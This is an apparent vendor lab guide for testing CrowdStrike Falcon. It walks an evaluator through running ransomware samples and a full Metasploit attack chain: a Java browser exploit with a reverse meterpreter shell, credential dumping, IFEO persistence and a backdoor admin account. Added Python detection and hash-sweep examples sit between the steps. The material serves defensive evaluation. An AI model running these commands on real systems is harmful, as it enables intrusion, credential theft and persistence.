
04/30/2018

Table of Contents
INTRODUCTION 2

ENVIRONMENT OVERVIEW 3
CLOUDSHARE TIPS: 3
USING THE FALCON UI: 5

TESTING SCENARIOS 6
SCENARIO 1: SENSOR INSTALL 6
SCENARIO 2: RANSOMWARE 8
SCENARIO 3: PHISHING EMAIL AND BROWSER BASED EXPLOIT 12
SCENARIO 4: INVESTIGATE 24
SCENARIO 5: EVENTS APP 26

CONCLUSION 27

INTRODUCTION

Welcome to the CrowdStrike Falcon Test Drive. This document will walk you through our virtual test
environment which allows you to get some initial hands on experience with CrowdStrike Falcon. This virtual
environment is a shared instance in the CrowdStrike Platform and comes with a few restrictions. For example,
you will have read only access to the UI and cannot change settings to prevent interference with other test
drivers. We encourage you to go through this document and then reach out to your CrowdStrike contact and
request a full POV (Proof of Value), which would give you your own dedicated instance of CrowdStrike Falcon,
the ability to install sensors in your own environment, make policy changes and also a technical resource at
CrowdStrike to help with deep dive demonstrations.

We hope you enjoy this test drive and thank you for considering CrowdStrike Falcon.

ENVIRONMENT OVERVIEW

By now, a CloudShare environment has already been provisioned for you (if for some reason you are reading
this and you do not have a Test Drive account for CloudShare yet, please go ahead and contact us).
Within this environment, you will have access to the Virtual Machines listed below. You will be installing the
CrowdStrike Falcon sensor on the Victim VM within CloudShare only.

Name                      OS                       IP Address
Attacker VM (Metasploit)  Ubuntu 12.04.3 Desktop   10.160.128.168
Victim VM                 Windows 7 x64            10.160.179.148

To access the environment, please visit https://use.cloudshare.com/Login.aspx and login using the credentials
you configured when first accessing the environment.

CloudShare Tips:

1. Once logged in to your CloudShare account, you will be presented with the following page. Click on the
“Start Using This Environment” link to get started. In cases where your environment is suspended after
being idle for an hour, the resume process may take 3-5 minutes.

2. You will now see a list of your VMs.

3. To access the VMs, click on the “View VM” button and open the virtual machines. You can switch
between the “Victim VM” and “Attacker VM” via the tabs at the top.

4. Additional details, such as the credentials for each of the machines, can be found on the left hand side
menu.

5. To copy/paste text into the VM, use the “VM Clipboard” option.

6. NOTE: Your CloudShare instance will be assigned a random hostname. You need to write down that
hostname and use it when accessing the Falcon UI to filter results for just your machine.

● Windows 7 Victim VM → hostname → CS-XXXXXX-XXXX

Using the Falcon UI:

The console for CrowdStrike Falcon is 100% managed in the cloud, which means there are no management
servers for you to configure, upgrade, back up, or patch. You can log in to the console from any
browser by going to https://falcon.crowdstrike.com. We recommend that you use Google Chrome as
your browser for the best user experience.

Credentials for the Falcon UI have been provided to you in a separate email and are different from
your CloudShare credentials.

TESTING SCENARIOS

The following scenarios can be used to extensively assess CrowdStrike Falcon’s capabilities to detect and
prevent advanced attacks. These scenarios directly mimic real life techniques used by adversaries every day.  

Scenario 1: Sensor Install

Summary
This first Scenario is only going to install the CrowdStrike Falcon Sensor on your Victim VM machine
and verify that the sensor has registered with the CrowdStrike Platform. You will see how quick and
easy it is to deploy CrowdStrike Falcon and get a machine protected.

Step by Step

1. Open the Victim VM. On the Desktop, locate the “WindowsSensor” installer and double click it.

2. Follow the on screen prompts to finish the installation. Note that no reboot is required after installing
CrowdStrike Falcon and that you will not see anything in the system tray of the VM.

3. In the upper right hand corner of your Desktop you should see the hostname of the machine (in our
example it was CS-161216-1221). Please write your hostname down as you will need it several times
when going through the Scenarios. It is recommended to keep the hostname in a text editor to be able
to copy and paste it easily.

4. Switch to the Falcon UI tab and navigate to the “Hosts app” on the left hand side. Paste your hostname
into the filter field on top and see if your machine appears. If your machine does not appear right
away, please refresh in 1 minute.

5. Congratulations, you have completed your CrowdStrike Falcon install and are now ready to proceed to
attack your machine.

Scenario 2: Ransomware

Summary
In this Scenario we will run through how CrowdStrike Falcon Machine Learning protects you from
ransomware, how the Falcon UI displays detections and how behavioral protections can help with
unknown malware.

Step by Step
1. On the Desktop of your Victim VM you can find a folder called malware. Inside are individual pieces of
malware, for example the Locky and WannaCry ransomware. These are real, unmodified pieces of
malware that should not be used outside of this Test Drive environment!

You can use any of the malware files in the folder. For simplicity we will use “locky.zip” in our guide.
The same instructions apply to the other samples.

Right click on “locky.zip”, then select “7-Zip” >> “Extract to locky\”. The password is infected. After the
extraction has finished, open the “locky” folder and double click “locky.exe”. You will see that
CrowdStrike Falcon prevents the executable from running and quarantines the file.

2. Switch to the Falcon UI and, if you are not already there, open the “Activity app” on the left hand side.

3. Now please type Hostname:CS-161216-1221 (replace CS-161216-1221 with your Victim VM hostname)
into the filter field on top of the detections and press enter. If no detection is showing up, please
refresh in 1 minute and verify the host name.

4. Click on the new alert from your host to see the process tree of this detection. Locky was detected by
the signature-less machine learning engine of CrowdStrike Falcon. But when you click on “locky.exe”,
you can also see that there have been 52 AV Detections for this file.

5. We will now modify “locky.exe” so that the file hash changes and the file becomes unknown malware.
Switch back to your Victim VM and extract “locky.zip” again like you did in Step 1. Then right click on
“locky.exe” and select “Open with HxD”.

6. HxD is a hex editor that allows us to modify the binary directly. On the right hand side, find the text
that reads “… be run in DOS mode” and modify a part of it with new text. For example, click inside the
word “DOS” after the “D” and change it to “DXS” by typing “X”.
Note: To preserve the integrity of the file, you need to make sure that you do not end up with fewer
or more characters than you started with. HxD by default is in overwrite mode.

7. When you are done editing the file, please click on “File >> Save as” and then give it a new name like
“locky_modified.exe”. You need to type the extension “.exe” at the end.

8. Now double click “locky_modified.exe” and see that the file again gets blocked and quarantined. If
you switch back to your Falcon UI tab and go back to the detections screen (filtered for your
hostname), you will see a second detection now.

Expanding the detection, you can see the process tree for our modified sample, and when clicking on
“locky_modified.exe” you can see 0 AV detections on this unknown sample.

Congratulations. In this Scenario we have shown how CrowdStrike Falcon prevents common malware, and
even after modifying the malware, just like the bad guys do, CrowdStrike Falcon still protected the system with its
Machine Learning engine.

Scenario 3: Phishing email and browser based exploit

Summary

This is one of the most common tactics used to compromise an end user’s system. An adversary will
often employ social engineering through spear phishing emails that directly target members of an
organization with custom messages that increase the likelihood of the user clicking on a link or opening
an attachment. Once they have gained access to one user’s system they will exfiltrate any relevant
data and attempt to move laterally to other systems on the network.

Step by Step

1. Open the Attacker VM and see if Metasploit is already started. If it is not, please open a terminal and
type “msfconsole” to start Metasploit.

2. On the Desktop is a text file called “metasploit-commands.txt”. If it is not yet open, please open it
now.
The Metasploit console and the text file with the commands should be placed so you can see them
both at the same time.

3. From the text file copy the first 8 commands (up to the line that says “exploit”) and paste them into
the Metasploit terminal window. Then hit “enter”.

Here are the details of the commands we are running:

a) Set up the payload by running the command use payload/windows/meterpreter/reverse_tcp.
This is what will be run on the system after the exploit has succeeded.
b) Run the command set LHOST 10.160.128.168 to tell the meterpreter shell which IP address it
should connect back to, where 10.160.128.168 is the IP address of the Attacker VM.
c) Run the command set AutoRunScript post/windows/manage/migrate to make sure the
meterpreter payload migrates to a clean process after exploitation.
d) Run the command use exploit/multi/browser/java_rhino; this will set up a browser based exploit
specific to Java.
e) Run the command set SRVHOST 10.160.128.168
f) Run the command set SRVPORT 8080
g) Run the command set URIPATH / so that the exploit is hosted at the root and no additional
information is required in the URI request.
h) Run the command exploit to set it all up, and take note of the URL being used.

4. With the Attacker VM configured, access the Victim VM. Open Outlook and review the “Action
Required: Your Mailbox is Full” message. Within this e-mail, a weaponized link is already provided.
Click on the link to start the exploit. Internet Explorer should open and only show a blank page.

5. Go back to the Attacker VM and you should now see the following output, which indicates the exploit
was successful and the meterpreter payload has been migrated into the memory space of
notepad.exe. This deters any file based scanning and whitelisting tools, as there are no file artifacts and
the malicious code is running from a valid application.

6. In the Falcon UI a new detection event has been generated; click on the detection for more details.
CrowdStrike Falcon has identified the web exploit activity and also captured the relevant metadata,
such as the exploit site domain and IP address. Additionally, the process tree identifies the parent
process as outlook.exe, which clearly indicates the exploit occurred as the result of a phishing email.

Click on “Full detection details” to view the detection in a process tree.

7. Switch back to the Attacker VM and copy/paste the following commands from your
metasploit-commands.txt file:
a) sessions -l to get a list of active meterpreter sessions
b) sessions -i 1 (where 1 is the session Id you received as output).

8. You now have full access to the target system and can run built in meterpreter commands. In your text
file you will find the commands for our next steps (please copy/paste/run these one at a time):
a) upload lslsass64.exe C:\\temp (credential theft tool used later in this scenario)
b) shell (get a Windows command prompt)
c) whoami (determine the user account context of your shell)
d) taskkill /IM iexplore.exe /F (kill the Internet Explorer window to hide your tracks)
e) netstat -ano (identify current network connections and potential targets)
f) ipconfig (obtain network stack information)

9. Switch back to the Falcon UI and refresh your web browser that is opened to the detection details
page. Click on the little plus symbol at the corner of “cmd.exe”. Notice the commands you just
executed have been captured in real-time and recorded within the process tree with corresponding
metadata.

10. One of the technologies powering CrowdStrike Falcon’s intelligence based attribution capabilities is our
own Threat Intelligence platform. For our test, we will be using only a simple intelligence indicator.
On the Attacker VM, please copy and paste the command ping -n 1 systemlowcheck.com from your
metasploit-commands.txt. Then refresh your Falcon UI detection page and you will notice a new
detection pattern called “Intel”.

11. In the details view, we can see that this domain is associated with one of the adversaries we track and
that it was used in targeted attacks before. Please copy the domain name and then open the “Actors”
app in a new tab (right click). In the Actors app, please paste the domain name into the search bar to
see additional details on the adversary Fancy Bear. Once you are done reviewing the additional details,
you may close the tab.

12. In the following example, we will be using a modified binary capable of dumping a user’s password
hash. You uploaded “lslsass64.exe” as one of the earlier steps in meterpreter. Now it is time to use it.
Switch back to the Attacker VM and copy/paste the following commands from your text file:
a) cd C:\temp
b) lslsass64.exe a

13. Refresh your browser with the detection page open and notice the updated “Credential Theft” detection
pattern showing up, reflecting your recent lslsass64.exe tool run. Also, notice how lslsass64.exe shows
“0 AV Detections” since we are running a modified version. This detection was picked up as a result of
our Indicator of Attack (IOA) capable of detecting credential theft regardless of AV detections.

14. Now it is time to establish persistence. On the Attacker VM, copy/paste the next command into your
shell. This will create a registry entry on the target system allowing a system level shell to be invoked
any time the osk.exe (on screen keyboard) process is called.
a) reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

15. This activity has triggered another detection with Suspicious Activity. Refresh the detection UI to see
the updated information. The full command line input is captured, as well as the metadata under
Persistence that identifies the specific registry key that has been updated.

16. Open a new terminal/shell on the Attacker VM (right click on Terminal > New Terminal). Type the
command rdesktop 10.160.179.148 to open a remote desktop session to the Victim VM.

17. In the remote Desktop window click the accessibility icon on the bottom left and check the On-Screen
Keyboard option. Click Apply and you’ll see a command prompt open.

NOTE: The rdesktop window times out pretty quickly if no activity is detected. If your
rdesktop window closes, just run the rdesktop command from step 16 again.

18. The shell has system level privileges (run the command whoami to confirm) and, better yet, did not
generate any Windows logon events. This technique is used by advanced adversaries as it goes
undetected by traditional security solutions.

19. Switch back to your Falcon UI. Go back to the detections screen (filtered for your hostname) and you
will find a new detection event has been generated. Navigate to the new detection details and you will
see a Critical event has been generated that identifies this as a Privilege Escalation attack.

20. Switch back to the Attacker VM where the Remote Desktop session is open (restart it if it timed out).
In the open command prompt, go ahead and create a new local administrator account:
a) net user webadmin testpass$1234 /add
b) net localgroup administrators webadmin /add

21. Navigate back to the Falcon UI and click on the “Full Detection Details” option in your detection. You
can now expand “CMD.EXE” to see that the commands typed above were added to the event.

22. After checking the events in the UI, let’s test the new user you created in the remote desktop session
(note: if the session has timed out in the terminal, just open a new one; the user account created will
still be there). Run rdesktop 10.160.179.148 and use username webadmin and password
testpass$1234 to log in.
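The command lines captured in steps 14/15 (the reg.exe write to an Image File Execution Options Debugger value) and steps 20/21 (net user / net localgroup administrators) are exactly the kind of input a detection rule runs over. The following is an added example, not CrowdStrike code and not Falcon's own detection logic: a small rule set applied to constructed process-execution records in a made-up pipe-separated shape (host|parent|image|command line). osk.exe is the target the page uses; the other accessibility binaries in ACCESSIBILITY_BINARIES are an assumed extension of the same technique.

```python
import re
from dataclasses import dataclass


@dataclass
class Detection:
    host: str
    name: str
    detail: str


# Constructed sample records (not real Falcon telemetry), one process
# execution per line: <host>|<parent image>|<image>|<command line>.
SAMPLE_EVENTS = """\
CS-161216-1221|cmd.exe|reg.exe|reg.exe add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
CS-161216-1221|cmd.exe|net.exe|net user webadmin testpass$1234 /add
CS-161216-1221|cmd.exe|net.exe|net localgroup administrators webadmin /add
CS-161216-1221|explorer.exe|notepad.exe|notepad.exe C:\\Users\\user\\notes.txt
CS-161216-1221|cmd.exe|reg.exe|reg.exe query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
"""

# Accessibility binaries reachable from the logon screen; hijacking their IFEO
# Debugger value yields a SYSTEM shell. osk.exe is from the page, the rest are
# an assumed extension of the same technique.
ACCESSIBILITY_BINARIES = {"osk.exe", "sethc.exe", "utilman.exe", "narrator.exe", "magnify.exe"}

# A reg.exe write that sets a Debugger value under an IFEO subkey.
REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\b", re.IGNORECASE)
IFEO_DEBUGGER = re.compile(
    r'Image File Execution Options\\(?P<image>[^\\"]+)"?\s+/v\s+"?Debugger"?.*?/d\s+"?(?P<debugger>[^"\s]+)',
    re.IGNORECASE,
)
# Local account creation and local Administrators membership via net/net1.
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(?P<user>\S+)\s+(?:\S+\s+)?/add\b", re.IGNORECASE)
NET_ADMIN_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.IGNORECASE)


def parse_events(text):
    """Split the constructed pipe-separated records into dicts."""
    events = []
    for line in text.strip().splitlines():
        host, parent, image, cmdline = line.split("|", 3)
        events.append({"host": host, "parent": parent, "image": image, "cmdline": cmdline})
    return events


def evaluate(event):
    """Apply every rule to one event and return the detections it raises."""
    host, cmd = event["host"], event["cmdline"]
    hits = []
    m = IFEO_DEBUGGER.search(cmd)
    if m and REG_ADD.search(cmd):
        image = m.group("image").lower()
        # A debugger on an accessibility binary is the classic logon-screen backdoor.
        severity = "critical" if image in ACCESSIBILITY_BINARIES else "high"
        hits.append(Detection(host, "Persistence: IFEO Debugger",
                              f"{image} -> {m.group('debugger')} ({severity})"))
    m = NET_USER_ADD.search(cmd)
    if m:
        hits.append(Detection(host, "Local account created", m.group("user")))
    m = NET_ADMIN_ADD.search(cmd)
    if m:
        hits.append(Detection(host, "Added to local Administrators", m.group("user")))
    return hits


def scan(text):
    """Run the rules over every record and return all detections in order."""
    return [hit for ev in parse_events(text) for hit in evaluate(ev)]


if __name__ == "__main__":
    for d in scan(SAMPLE_EVENTS):
        print(f"{d.host}: {d.name}: {d.detail}")
```

The reg.exe query line in the sample is there on purpose: reading the IFEO key is routine and raises nothing, only a write of a Debugger value does. The same regexes work unchanged on a Sysmon Event ID 1 CommandLine field or on the command lines Falcon shows under the cmd.exe node in the process tree.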

23. Congratulations, you have completed an entire advanced attack scenario, including exploiting a
vulnerable machine, performing reconnaissance and establishing persistence. CrowdStrike Falcon gave
you full visibility into each step of the attack. For this scenario, the CrowdStrike Falcon preventions
were disabled so the attack could succeed and you could experience every step of this breach. The
detections you have seen can easily be turned into preventions.

For a complete demonstration of prevention capabilities, please reach out to your CrowdStrike
representative and request a POV.
Scenario 4: Investigate

Using the machine name of the Victim VM we will go through a quick scenario to illustrate how the Investigate
app works and all the information available in the Falcon UI. In this scenario we will:

● Investigate activity associated with a single machine, using the machine name to search for events.
● Run a file with a specific hash to illustrate how the Investigate app can search for a single hash.
This step can be done for a single hash or in bulk for IOC hunting scenarios.

1. To start, open the Victim VM and locate the host name in the upper right hand corner.

2. Navigate back to the Falcon UI and find the “Investigate” app on the left hand side. The default search
page will be “Computer”. In the “Host Name” field type in the name of your host from the previous
step. The Investigate app can filter on time frame to give you things like detection history, unresolved
detections, process executions, network connections and others associated with your host.

3. Go back to the Victim VM and find a folder on the desktop named “this_does_nothing_v1”.

4. Open the folder and run the file. Doing so will open a command prompt and print a hash to the screen.
The hash of the file is 4e106c973f28acfc4461caec3179319e784afa9cd939e3eda41ee7426e60989f

5. Back in the Falcon UI, in the Investigate app navigate to the “Hash Search” option and paste in the hash
“4e106c973f28acfc4461caec3179319e784afa9cd939e3eda41ee7426e60989f”. Change the “Time
Range” to include more than a month and hit “Submit”.
The results will not only show your machine, but any other machine in the environment with this IOC
hash.
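Two passages above rest on the same property of file hashes: Scenario 2 shows that the single-byte "DOS" to "DXS" edit turns a sample with 52 AV detections into one with 0, and this Hash Search step shows that a known hash is still the fastest way to sweep every host for a known file. The following is an added example, not CrowdStrike code and not the Investigate app's own logic. It builds a constructed stand-in for a PE file (just an MZ header and the DOS-stub text, not an executable), applies the same length-preserving edit the HxD step describes, and then runs a bulk IOC sweep over a constructed host inventory. The hostnames, paths and hashes in the inventory are made up.

```python
import hashlib

# Constructed stand-in for the file edited in Scenario 2: an "MZ" header and
# the DOS-stub text the page has you change in HxD. Not a real executable.
ORIGINAL_SAMPLE = (
    b"MZ" + b"\x90" * 62
    + b"This program cannot be run in DOS mode.\r\n$"
    + b"\x00" * 32
)


def sha256_hex(data: bytes) -> str:
    """SHA-256 of a file's bytes, the value the Investigate app's Hash Search takes."""
    return hashlib.sha256(data).hexdigest()


def patch_in_place(data: bytes, old: bytes, new: bytes) -> bytes:
    """Replace one occurrence of `old` with `new` without changing the length.

    This mirrors the HxD overwrite-mode note in Scenario 2: a length change
    would shift every offset in the PE headers and corrupt the file.
    """
    if len(old) != len(new):
        raise ValueError("replacement must keep the file length unchanged")
    offset = data.find(old)
    if offset < 0:
        raise ValueError("pattern not found in sample")
    return data[:offset] + new + data[offset + len(old):]


def build_inventory(original: bytes, modified: bytes):
    """Constructed (hostname, path, sha256) records, as an endpoint file
    inventory would present them to a hash sweep."""
    return [
        ("CS-161216-1221", r"C:\Users\user\Desktop\locky\locky.exe", sha256_hex(original)),
        ("CS-161216-1221", r"C:\Users\user\Desktop\locky\locky_modified.exe", sha256_hex(modified)),
        ("CS-170101-0001", r"C:\Users\alice\Downloads\invoice.exe", sha256_hex(original)),
        ("CS-170101-0002", r"C:\Windows\notepad.exe", sha256_hex(b"constructed benign content")),
    ]


def hunt(inventory, ioc_hashes):
    """Bulk IOC sweep: every (host, path) whose SHA-256 is in the IOC set."""
    wanted = {h.lower() for h in ioc_hashes}
    return [(host, path) for host, path, digest in inventory if digest in wanted]


if __name__ == "__main__":
    modified = patch_in_place(ORIGINAL_SAMPLE, b"DOS", b"DXS")
    print("original :", sha256_hex(ORIGINAL_SAMPLE))
    print("modified :", sha256_hex(modified))
    # The hash sweep finds every copy of the known sample across hosts...
    for host, path in hunt(build_inventory(ORIGINAL_SAMPLE, modified), {sha256_hex(ORIGINAL_SAMPLE)}):
        print("IOC hit  :", host, path)
    # ...but locky_modified.exe, one byte different, is invisible to it, which is
    # why Scenario 2 relies on the behavioural/ML layer rather than AV hashes.
```

The sweep returns the two hosts holding byte-identical copies and misses locky_modified.exe entirely, which is the point the two scenarios make together: hash search is the right tool for "where else is this exact file", and the wrong one for "is this file malicious".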

6. Congratulations, you just experienced the detailed visibility the CrowdStrike Falcon platform can give
you not only for individual hosts, but for your entire network.

Scenario 5: Events Search

The Events app can be used for very granular hunting. It is a front end that uses the “Splunk” syntax.
In this scenario we will show you a single example of the type of visibility you can get. There are hundreds of
other searches that can be performed with the Events app. Please reach out to us to get a full demo of the
capabilities of this CrowdStrike Falcon feature.

1. On the Victim VM open PowerShell (a shortcut is provided in the menu bar) and type in the following
commands:
a) whoami
b) netstat
c) exit

2. Now navigate back to the Falcon UI and find the “Investigate” app on the left hand side. Select “Event
Search” from the options.
In the search field type
ComputerName=CS-161014-1049 ApplicationName=powershell.exe CommandHistory
NOTE: The computer name should be the name of your victim machine that you typed the commands
on.

It can take up to 15 minutes for the full commands to be available in the Events Search. If your search
returns “No results found”, give it a little bit of time and try again.

CONCLUSION

This test drive is designed to give you some hands on experience with CrowdStrike Falcon and the
different prevention, detection and visibility features it offers. We sincerely hope you enjoyed the
experience and had some fun in the process. If you would like to talk more about CrowdStrike Falcon
or get a full demonstration, please contact your CrowdStrike representative.

